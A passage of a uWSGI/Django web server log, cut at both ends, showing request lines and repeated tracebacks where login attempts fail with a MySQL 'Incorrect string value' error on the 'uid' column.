"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 629/750] 219.228.146.253 () {48 vars in 1010 bytes} [Thu Jan 14 07:59:19 2021] POST /login/ => generated 209926 bytes in 123 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: / +[pid: 2069|app: 0|req: 630/751] 219.228.146.246 () {36 vars in 677 bytes} [Thu Jan 14 08:01:16 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 2069|app: 0|req: 631/752] 219.228.146.246 () {36 vars in 678 bytes} [Thu Jan 14 08:01:19 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 632/753] 219.228.146.246 () {36 vars in 688 bytes} [Thu Jan 14 08:01:54 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 633/754] 219.228.146.246 () {36 vars in 690 bytes} [Thu Jan 14 08:01:55 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/755] 219.228.146.246 () {38 vars in 785 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/756] 219.228.146.246 () {38 vars in 789 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/757] 219.228.146.246 () {38 vars in 807 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/758] 219.228.146.246 () {38 vars in 787 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/759] 219.228.146.246 () {38 vars in 793 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/760] 219.228.146.246 () {38 vars in 766 bytes} [Thu Jan 14 08:01:55 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/761] 219.228.146.246 () {38 vars in 764 bytes} [Thu Jan 14 08:01:55 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/762] 219.228.146.246 () {38 vars in 782 bytes} [Thu Jan 14 08:01:55 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/763] 219.228.146.246 () {38 vars in 780 bytes} [Thu Jan 14 08:01:56 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/764] 219.228.146.246 () {38 vars in 773 bytes} [Thu Jan 14 08:01:56 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/765] 219.228.146.246 () {38 vars in 838 bytes} [Thu Jan 14 08:01:58 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 634/766] 219.228.146.246 () {48 vars in 983 bytes} [Thu Jan 14 08:02:35 2021] POST /login/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 635/767] 219.228.146.246 () {40 vars in 868 bytes} [Thu Jan 14 08:02:36 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 636/768] 219.228.146.246 () {40 vars in 870 bytes} [Thu Jan 14 08:02:36 2021] GET /home/ => generated 7488 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 637/769] 114.87.230.234 () {38 vars in 921 bytes} [Thu Jan 14 08:03:23 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/770] 114.87.230.234 () {40 vars in 959 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/771] 114.87.230.234 () {40 vars in 983 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/772] 114.87.230.234 () {40 vars in 963 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/773] 114.87.230.234 () {40 vars in 969 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/774] 114.87.230.234 () {40 vars in 943 bytes} [Thu Jan 14 08:03:23 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/775] 114.87.230.234 () {40 vars in 965 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/776] 114.87.230.234 () {40 vars in 942 bytes} [Thu Jan 14 08:03:24 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/777] 114.87.230.234 () {40 vars in 958 bytes} [Thu Jan 14 08:03:24 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/778] 114.87.230.234 () {40 vars in 960 bytes} [Thu Jan 14 08:03:24 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/779] 114.87.230.234 () {40 vars in 950 bytes} [Thu Jan 14 08:03:24 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/780] 114.87.230.234 () {40 vars in 1027 bytes} [Thu Jan 14 08:03:26 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/781] 114.87.230.234 () {40 vars in 1033 bytes} [Thu Jan 14 08:03:26 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/782] 114.87.230.234 () {40 vars in 1001 bytes} [Thu Jan 14 08:03:26 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 638/783] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:03:47 2021] POST /login/ => generated 209897 bytes in 96 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 639/784] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:03:52 2021] POST /login/ => generated 209897 bytes in 132 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 640/785] 114.87.230.234 () {48 vars in 1114 bytes} [Thu Jan 14 08:04:02 2021] POST /login/ => generated 209895 bytes in 165 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File 